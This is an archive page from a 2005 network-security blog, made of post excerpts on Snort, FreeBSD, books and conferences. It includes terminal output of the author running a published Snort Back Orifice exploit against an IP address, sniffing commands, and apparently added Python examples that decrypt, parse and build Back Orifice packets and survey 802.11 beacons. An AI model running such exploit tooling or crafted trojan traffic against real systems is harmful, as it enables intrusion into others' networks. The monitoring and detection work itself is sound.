Monday, 31 October 2005

Bejtlich to Speak at ShmooCon 2006

I just learned I will speak at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject is Network Security Monitoring with Sgu...

Friday, 28 October 2005

First Hampton Roads, VA Snort Users Group Meeting

My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more detai...

FreeBSD 6.0-RELEASE Available Soon

According to this announcement by FreeBSD release engineer Scott Long, FreeBSD 6.0-RELEASE "will likely be announced by the end of the weekend or early next week, at the latest." This is great news. I plan to upgrade all of my 5.4 systems to 6.0 when it is available. I'll post my experienc...

Thursday, 27 October 2005

New (IN)SECURE Magazine Features Bejtlich Article

The latest (IN)SECURE magazine was just published. Issue 1.4 features a 7-page article on Structured Traffic Analysis, a methodology to investigate network traces I developed for my Network Security Operations class. It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share the sentiments of a student in one of my recent classes who said "I'm embarrassed I ever used Ethereal to start network analysi...

Review of VMware Workstation 5 Handbook Posted

Amazon.com just posted my four star review of VMware Workstation 5 Handbook. From the review: "Steven S. Warren's VMware Workstation 5 Handbook (VW5H) is a great book for beginning and intermediate VMware Workstation (WS) users. It is well-written, thorough, and informative. Those who are trying to deploy WS for average home, research, or corporate purposes will find their needs met. Those looking for in-depth coverage exceeding VMware's online documentation...

VMware Workstation Vnetsniffer

Did you know VMware Workstation ships with a sniffer? I should have known about it before now. Lenny Zeltser mentioned it in his 2001 paper on reverse engineering malware. There are only 15 references in Google Groups, however. Vnetsniffer is very limited with regard to reporting. Here is sample output:

C:\Program Files\VMware\VMware Workstation>vnetsniffer
usage: vnetsniffer [/e] (/p "pvnID" | VMnet?)

C:\Program Files\VMware\VMware Workstation>runas /u:administrator "vnetsniffer /e vmnet0"
Enter password for administrator:
Attempting to start...

Wednesday, 26 October 2005

Bejtlich Books in HNS Contest

Mirko Zorz from Help Net Security notified me that two of my books are up for grabs in the HNS 7th Anniversary Book Contest. You could win Real Digital Forensics or Extrusion Detection: Security Monitoring for Internal Intrusions. The winners will be announced on Monday, 5 December 2005. Good lu...

Tuesday, 25 October 2005

Snort BO Exploit Published

As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.

orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target: 1 | manual testing gcc with -O0
Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target: 2 | manual testing gcc with -O2
Sending exploit to 66.93.110.10
Done.

Here...

Monday, 24 October 2005

Reviews of Computer Security 20 Things Every Employee Should Know, 2nd Ed, The Symantec Guide to Home Internet Security Posted

The drought has ended. Amazon.com just posted my two newest reviews. First was Computer Security 20 Things Every Employee Should Know, 2nd Ed by Ben Rothke. I gave it three stars, but I would give the next edition higher ratings if Ben addresses my suggestions. From the review: Ben Rothke's Computer Security: 20 Things Every Employee Should Know, 2nd Ed, contains a great deal of sound advice for nontechnical employees. At least 10 tips could be...

More on Engineering Disasters and Bird Flu

Here's another anecdote from the Engineering Disasters story I wrote about recently. In 1956 the cruise ship Andrea Doria was struck and sunk by the ocean liner Stockholm. At that time radar was still a fairly new innovation on sea vessels. Ship bridges were dimly lit, and the controls on radar systems were not illuminated. It is possible that the Stockholm radar operators misinterpreted the readings on their equipment, believing the Andrea Doria was 12 miles away when it was really 2 miles away. The ships literally turned towards one another...

Pre-Review Postscript

I neglected to mention a book I look forward to reading -- Essential SNMP, 2nd Ed by Douglas Mauro and Kevin Schmidt. Most of the technologies I deploy and use are passive monitoring systems. This book represents an active monitoring system, where SNMP is used to determine the status of network resources. I expect Wolfgang Barth's book on Nagios to also be helpful. Since mentioning the new Apress MySQL book yesterday, MySQL 5 has achieved general...

Bejtlich Speaking at RSA Conference 2006

My proposal to speak at the RSA Conference 2006 was accepted out of 1500+ submissions. I will present in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject is Traffic-Centric Incident Response and Forensi...

Sunday, 23 October 2005

Latest Book Pre-Reviews

During the last two months my work for TaoSecurity has kept me too busy to read and review books. I am trying to get back on track. Here are pre-reviews for books I have received over the last several weeks. First are two books I intend to keep as reference, but which I don't plan to read cover-to-cover. Hence, I won't review them for Amazon.com. First is Cisco IOS in a Nutshell, 2nd Ed by James Boney. I put this book next to my copy of O'Reilly's UNIX in a Nutshell, 3rd Ed. This book looks like an excellent reference for Cisco admins and...

Saturday, 22 October 2005

Further Thoughts on Engineering Disasters

My TiVo managed to save a few more episodes of Modern Marvels. You may remember I discussed engineering disasters last month. This episode of the show of the same title took a broader look at the problem. Three experts provided comments that resonated with me. First, Dr. Roger McCarthy of Exponent, Inc. offered the following story about problems with the Hubble Space Telescope. When Hubble was built on earth, engineers did not sufficiently address issues with the weight of the lens on Earth and deflections caused by gravity. When Hubble was...

Excellent Pf Documentation

I recently learned of Peter N. M. Hansteen's document Firewalling with OpenBSD's PF packet filter. I really like the approach Peter takes to describing Pf. He explains enabling Pf on OpenBSD, FreeBSD, and NetBSD, and then builds up the capabilities one can employ using Pf. I recommend anyone who wants to learn more about Pf start with Peter's document. Incidentally, OpenBSD 3.8 will be available at an FTP server near you on 1 Novemb...

The Coming Snort Worm

This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort versions 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort. I am sure ISS is still bitter over the Witty worm that revealed the installed ISS RealSecure and BlackIce userbase to be about...
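Both this post and the "Snort BO Exploit Published" post above turn on the same point: Snort's Back Orifice preprocessor has to try to decrypt every UDP payload it sees, because BO traffic carries no cleartext marker. The following is an added example, written for this page and not taken from Snort or from the original posts, that models that detection step: a 16-bit key space, an XOR keystream from a Windows-style LCG, and a precomputed lookup of the 8-byte magic under every key. The constants (magic "*!*QWTY?", default key 31337, LCG multiplier 214013 and increment 2531011) and the header layout after the magic are my recollection of the BO protocol and are assumptions here, not facts the page states. The packets fed to it are constructed in the block.

```python
# Added example, not Snort's code and not from the original posts.
# Constants and header layout are assumed from the BO protocol as recalled.
import struct

MAGIC = b"*!*QWTY?"   # plaintext header every BO packet starts with (assumed)
DEFAULT_KEY = 31337   # BO's key when no password is configured (assumed)
KEY_SPACE = 1 << 16   # BO keys are 16-bit, which is what makes brute force cheap


def keystream(key: int, n: int) -> bytes:
    """Generate n bytes of BO's XOR keystream from a 16-bit key.

    The key seeds a Windows rand()-style LCG; the low byte of each 15-bit
    output is used. State is kept at 32 bits so results do not depend on the
    host's word size.
    """
    state = key & 0xFFFFFFFF
    out = bytearray()
    for _ in range(n):
        state = (state * 214013 + 2531011) & 0xFFFFFFFF
        out.append(((state >> 16) & 0x7FFF) & 0xFF)
    return bytes(out)


def bo_crypt(data: bytes, key: int) -> bytes:
    """Encrypt or decrypt; XOR is its own inverse."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


_TABLE = None


def magic_table() -> dict:
    """Map encrypted-magic -> key for every key, built once.

    Precomputing the first 8 keystream bytes for all 65536 keys turns the
    per-packet cost into one dictionary lookup instead of 65536 trial
    decryptions, which is what makes "decrypt every UDP packet" affordable.
    """
    global _TABLE
    if _TABLE is None:
        _TABLE = {bo_crypt(MAGIC, k): k for k in range(KEY_SPACE)}
    return _TABLE


def find_bo_key(payload: bytes):
    """Return the key if the payload decrypts to a BO header, else None."""
    if len(payload) < len(MAGIC):
        return None
    return magic_table().get(payload[:len(MAGIC)])


def parse_bo_packet(payload: bytes):
    """Decrypt and parse the BO header, refusing inconsistent length fields.

    Assumed layout after the magic: little-endian length (4), id (4), type (1),
    then data. The decoded length is attacker-controlled, so it is compared to
    the real payload size before anything else trusts it.
    """
    key = find_bo_key(payload)
    if key is None or len(payload) < 17:
        return None
    plain = bo_crypt(payload, key)
    length, pkt_id, ptype = struct.unpack_from("<IIB", plain, 8)
    if length != len(payload):
        return None  # claimed size does not match what was captured
    return {"key": key, "length": length, "id": pkt_id, "type": ptype,
            "data": plain[17:]}


def build_bo_packet(ptype: int, data: bytes, key: int = DEFAULT_KEY,
                    pkt_id: int = 1) -> bytes:
    """Constructed test traffic: a BO packet in the assumed layout."""
    body = MAGIC + struct.pack("<IIB", 0, pkt_id, ptype) + data
    body = body[:8] + struct.pack("<I", len(body)) + body[12:]
    return bo_crypt(body, key)


if __name__ == "__main__":
    pkt = build_bo_packet(1, b"ping")          # constructed BO "ping", not captured
    print(find_bo_key(pkt), parse_bo_packet(pkt))
```

The design point for a monitoring engineer is the one the post is making: a preprocessor like this runs its decryption and header parsing against arbitrary UDP from the network, so any parsing of the decrypted header (here the length field) is reachable by anyone who can send a packet past the sensor. The page does not describe the specific flaw, and this example does not reproduce it; it only shows where that attack surface lives.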

Friday, 21 October 2005

VMware Player Changes Everything

In the words of the immortal Joey -- "whoa." I just learned of, and tried, the new VMware Player. If you haven't heard of it yet, VMware Player is a free program for Windows and Linux users that allows them to run a single VM on their host OS. VMware Player is like a stripped down version of VMware Workstation. It does not support snapshots, and the documentation says only one VM can run at a time (despite what the comparison chart implies). This...

VirtualWiFi and Monitoring

While teaching Network Security Operations last week, I presented material on monitoring wireless networks. Sample syntax follows:

orr:/root# ifconfig wi0 mediaopt monitor channel 6 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
  EN10MB (Ethernet)
  IEEE802_11 (802.11)
  IEEE802_11_RADIO (802.11 plus BSD radio information header)
orr:/root# tcpdump -n -i wi0 -y IEEE802_11

One of the students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because...
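With -y IEEE802_11, as above, tcpdump hands you raw 802.11 frames with no radio header, so the first thing a monitor sees from each network is its beacon. The following is an added example, not from the original post, that parses such beacons (BSSID, SSID, the DS Parameter Set channel, and the Privacy capability bit) and tallies which channels carry which networks; that survey is what a channel hopper needs in order to know where to dwell. The frames are constructed in the block rather than captured, so it runs without a wireless card; the field offsets follow the 802.11 management frame format.

```python
# Added example, not from the original post: parse raw 802.11 beacons
# (the IEEE802_11 link type, no radiotap/BSD radio header) and survey channels.
import struct

BEACON_HEADER = 24      # frame control, duration, addr1..3, sequence control
BEACON_FIXED = 12       # timestamp(8) + beacon interval(2) + capabilities(2)
CAP_PRIVACY = 0x0010    # Privacy capability bit: encryption in use
IE_SSID, IE_DS_PARAMS = 0, 3


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_beacon(frame: bytes):
    """Return {bssid, ssid, channel, privacy} for a beacon frame, else None.

    Frames that are not beacons or are too short for the fixed fields are
    skipped. A truncated information element stops the walk rather than
    reading past the end of the frame.
    """
    if len(frame) < BEACON_HEADER + BEACON_FIXED:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype != 8:      # management type, beacon subtype
        return None
    bssid = frame[16:22]                # addr3 carries the BSSID in a beacon
    body = frame[BEACON_HEADER:]
    _ts, _interval, caps = struct.unpack_from("<QHH", body, 0)
    ssid, channel = None, None
    pos = BEACON_FIXED
    while pos + 2 <= len(body):
        tag, ln = body[pos], body[pos + 1]
        val = body[pos + 2:pos + 2 + ln]
        if len(val) < ln:
            break                       # IE claims more bytes than remain
        if tag == IE_SSID:
            ssid = val.decode("utf-8", "replace")
        elif tag == IE_DS_PARAMS and ln == 1:
            channel = val[0]
        pos += 2 + ln
    return {"bssid": mac_str(bssid), "ssid": ssid, "channel": channel,
            "privacy": bool(caps & CAP_PRIVACY)}


def channel_survey(frames):
    """Group networks by channel: {channel: {(ssid, bssid, privacy), ...}}."""
    seen = {}
    for f in frames:
        b = parse_beacon(f)
        if b is None:
            continue
        seen.setdefault(b["channel"], set()).add(
            (b["ssid"], b["bssid"], b["privacy"]))
    return seen


def build_beacon(bssid: bytes, ssid: str, channel: int,
                 privacy: bool = False) -> bytes:
    """Constructed sample beacon so the parser can be exercised offline."""
    fc = b"\x80\x00"                    # management frame, subtype 8 (beacon)
    header = fc + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    caps = 0x0001 | (CAP_PRIVACY if privacy else 0)   # ESS, optionally Privacy
    body = struct.pack("<QHH", 0, 100, caps)
    body += bytes([IE_SSID, len(ssid)]) + ssid.encode()
    body += bytes([1, 1, 0x82])          # supported rates: 1 Mbps (basic)
    body += bytes([IE_DS_PARAMS, 1, channel])
    return header + body


# Constructed sample capture (not real traffic): three beacons and one data frame.
SAMPLE_FRAMES = [
    build_beacon(b"\x00\x11\x22\x33\x44\x55", "lab-open", 6),
    build_beacon(b"\x00\x11\x22\x33\x44\x66", "lab-wep", 11, privacy=True),
    build_beacon(b"\x00\x11\x22\x33\x44\x77", "lab-wep", 11, privacy=True),
    b"\x08\x02" + b"\x00" * 30,          # a data frame; the parser ignores it
]

if __name__ == "__main__":
    for ch, nets in sorted(channel_survey(SAMPLE_FRAMES).items()):
        print(ch, sorted(nets))
```

Two beacons advertising the same SSID from different BSSIDs on the same channel, as in the sample, is normal for a multi-AP network but is also exactly what an evil-twin access point looks like, so a survey like this is worth keeping as a baseline. To feed real frames in, read the capture tcpdump wrote with -w and strip the pcap record headers; with -y IEEE802_11_RADIO you would additionally have to skip the radio header before byte 0 of the frame.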

Commercial Rootkits Make NSM Even More Relevant

Last month I posted Rootkits Make NSM More Relevant Than Ever. A few weeks ago I spoke at a Cisco training event attended by over 400 sales engineers and broadcast to several hundred more. I built my presentation on the "NSM, Now More Than Ever" theme. Since Cisco is a network infrastructure company, my message resonated with them. I would have delivered the same message to Microsoft if asked, but I am not a 31337 BlueHat h@x0r. Today I learned...

Monday, 17 October 2005

Useful Nmap Documentation

Today Slashdot notified me of an interview with Nmap author Fyodor. I found it interesting that Fyodor makes a living through Insecure.Com LLC, whose "primary business is licensing Nmap technology for inclusion in commercial products." I also learned he is working on a book on Nmap, and he "only [has] a couple chapters left to draft." Apparently the new Nmap man page is an excerpt from this book. By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not...

Sunday, 16 October 2005

Register for 20 October ISSA-NoVA Meeting by Noon Tuesday

To my DC metro area readers: if you'd like to attend the local ISSA-NoVA chapter meeting on Thursday night, please RSVP by noon Tuesday. I plan to be there to hear Paco Hope discuss FreeBSD and OpenB...

Friday, 14 October 2005

MySpace Worm Demonstrates NSM Principles

In my first book, The Tao of Network Security Monitoring: Beyond Intrusion Detection, I say "some intruders are smarter than you," and "intruders are unpredictable." Because of these two facts, prevention eventually fails. In other words, intruders are cleverly figuring out ways to circumvent security of services you have never heard about in ways you could not imagine. As a result, defenses fail and monitoring is the only way to detect that failure and respond appropriately. The story Cross-Site Scripting Worm Hits MySpace is a perfect example...

Thursday, 13 October 2005

Bejtlich Quotes in Sourcefire Acquisition Story

Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:

Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort. "I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."

That...

Tuesday, 11 October 2005

Brief Thought on Digital Security

I was asked to write an article for an upcoming issue of Information Security Magazine based on my Engineering Disasters blog post. I had the following thought after writing that article. When an engineering catastrophe befalls the "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc. This...

SecurityMetrics Documents Security Cycles

Andrew Jaquith of SecurityMetrics.org posted an interesting story called Hamster Wheels of Pain. It's a follow-up to an earlier article. I think the present story is cool because Andrew collected and posted the security process "wheels" of 11 security vendors. I recognize Foundstone's in there, shown as a thumbnail at left. I think Andrew is a little too cynical regarding some of these process charts. Some are used to sell products, and often...

BSD Certification Group Publishes BSD Associate Exam Objectives

Last week the BSD Certification Group published its BSD Associate Exam Objectives (.pdf). The preface of the document explains its purpose: "This document introduces the BSD Associate (BSDA) examination and describes in considerable detail the objectives covered by the exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD. While the testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all the details of each one....

FreeBSD 6.0-RC1 Available

I just read the announcement that FreeBSD 6.0-RC1 is available for download. There's a helpful link on the new front page that directly points to places to find the new release candidate. The 6.0 schedule does not list a release date, but the RC1 announcement says RC1 will be the only release candidate. I expect to see 6.0-RELEASE arrive within the next two weeks. Great work FreeBSD release engineering team! FreeBSD 5.5, at least one...

TaoSecurity Blog on CNET Blog 100

I received word today that this blog was added to the CNET News.com Blog 100 list. My site is described as a "good aggregation of information on a wide range of security issues. Detailed and authoritative, with many updates." I've been really busy preparing, teaching and speaking the last several weeks, but I expect to return to my normal blogging pace late next week. Thanks CN...

Saturday, 08 October 2005

New FreeBSD Web Site Launched

I like the look of the new FreeBSD home page, but the daemon in the middle looks obnoxiously large compared to the rest of the content. I'd much rather see Beastie small and somewhere else, preferably in a corner or on the community page. FreeBSD is an operating system for professionals; I'd like to see it treated seriously for once. On a related note, I found this interview with Scott Long very interesti...

Thoughts on the Week's Security News

This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week. I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various...

Saturday, 01 October 2005

Real Digital Forensics and Shirts

This week I received a batch of TaoSecurity T-shirts for my Network Security Operations class. The back of the T-shirt is pictured at left. The front of the T-shirt shows the TaoSecurity logo. I also received my copy of our new book Real Digital Forensics, also pictured at right. You can visit the publisher Addison-Wesley to review the table of contents, the preface, and also download the first chapter. It's a review of Windows live response. I...

Comment Verification Activated

Some idiot's comment spam bot posted over 70 "comments" to this blog last night. I am working my way through deleting them all. This is the latest salvo in an escalating battle which started with intermittent spam comments several months ago. To try to reduce these automated attacks in the future, I've enabled comment verification. I hope it is not too onerous for those making legitimate comments. Thank y...